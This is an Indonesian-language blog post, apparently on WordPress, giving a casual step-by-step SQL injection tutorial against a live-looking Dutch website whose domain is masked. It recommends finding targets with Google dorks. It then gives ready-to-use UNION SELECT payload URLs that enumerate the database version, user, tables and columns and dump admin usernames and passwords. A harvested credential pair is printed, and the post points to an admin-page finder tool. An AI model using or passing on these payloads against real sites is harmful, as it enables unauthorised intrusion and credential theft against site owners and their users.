Step by step sql injection (:D)

Kali ini saya akan membahas trick jadul sql injection. untuk mencari kelemahan / bug kita dapat mengunakan google dork. jika kurang mengerti tentang google dork anda dapat mencarinya di google…:D

langsung ke intinya saja karena barusan aku dah upload koq tak liat artikelnya malah ilang semua jadi males nulis lagi….Hiks..hiks…

1. Mencari website yang bisa dibuat sql boleh pake google atau apapun itu lah….

http://www.xxxxxx.nl/vervolg.php?id=-10

ya seperti ini website yang vuln

dengan hanya menambahkan single quato / tanda (-) di belakang url jika website itu vuln maka kita dapat inject

2. untuk lebih cepatnya menemukkan column berapa yang terdapat errror daripada cara jadul dicoba satu-satu mending pake ne tools  (klik disini).klo mau dicoba-coba satu ci boleh ja tapi yang monggo ntar kamu yang capek sendiri….:D

hasilnya seperti ini :

http://www.xxxxx.nl/vervolg.php?id=-10+AnD+1=NULL+uNiON+aLl+seLECt+1,2,3,4,5,6–

3. nanti akan muncul angka ajaib(kata hacker2 senior aku juga kurang tw…hohoho)

seperti di gambar

nah loe setelah itu akan keluar ntuh angka ajaib…:D(FUN…FUN…)

4. untuk mengetahui version dari databaase yang digunakan

http://www.xxxxxxx.nl/vervolg.php?id=-10 union select 1, version(), 3, 4, 5, 6–

akan muncul seperti digambar

5. untuk menampilkan nama database()

http://www.xxxxxx.nl/vervolg.php?id=-10 union select 1, database(), 3, 4, 5, 6–

6.  untuk menampilkan nama user()

http://www.xxxxxxx.nl/vervolg.php?id=-10 union select 1, user(), 3, 4, 5, 6–

7. untuk menampilkan lokasi database ditambahkan @@datadir

http://www.xxxxxxxxx.nl/vervolg.php?id=-10 union select 1, @@datadir, 3, 4, 5, 6–

8. untuk mengetahui apakah adakah update_priv

http://www.xxxxxxxxxxxxxx.nl/vervolg.php?id=-10 union select 1, update_priv, 3, 4, 5, 6+from+mysqluser–

9. untuk mengetahui list dari database yang vuln kita dapat mengunakan

http://www.xxxxxxxxxxxxx.nl/vervolg.php?id=-10 union select 1, group_concat(table_name), 3, 4, 5, 6+from+information_schema.tables+where+table_schema =database()—

admin,admin_CMS,bad,hoofditem,nieuws,practices,subitem,teksten,vervolgitem

10 . oke sebelum melangkah ke step berikutnya kita harus mengubah data temuan diatas menjadi hexadesimal,oke karena sekarang apa2 mudah maka kita dapat mengunjungi site berikut ini:

klik disini

setelah itu kita masukkan hasilnya mana yang ingin di convert

misal : admin_CMS ==> 61646d696e5f434d53

oke akan ketemu hasil sekian tapi jangan lupa untuk menambahkan 0x didepan hasil convert diatas.

11 untuk melihat column yang berada di dalam admin_CMS

http://www.xxxxxxxxx.nl/vervolg.php?id=-10 union select 1, group_concat(column_name), 3, 4, 5, 6+from+information_schema.columns+where+table_name=0x61646d696e5f434d53–

HASILNYA :id,username,password,naam,level

12. untuk melihat isi dari id,username,password

http://www.xxxxxxxxxx.nl/vervolg.php?id=-10 union select 1, group_concat(id,0x3a,username,0x3a,password), 3, 4, 5, 6+from+admin_CMS–

hasilnya:

1:echo:expert56

13. oke sekarang kita tinggal mencari halaman admin untuk halaman admin kita dapat mengunakan tools  login finder daripada susah coz alamat site diatas alamat orang luar negeri pakenya bahasa planet lagi.

dengan mengunakan tools  login finder

bisa didownload disini

14 . selanjutnya terserah anda………..:D

sekian dulu artikel ini……………………thank for alll


hacking for fun but coding very fun………:D

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s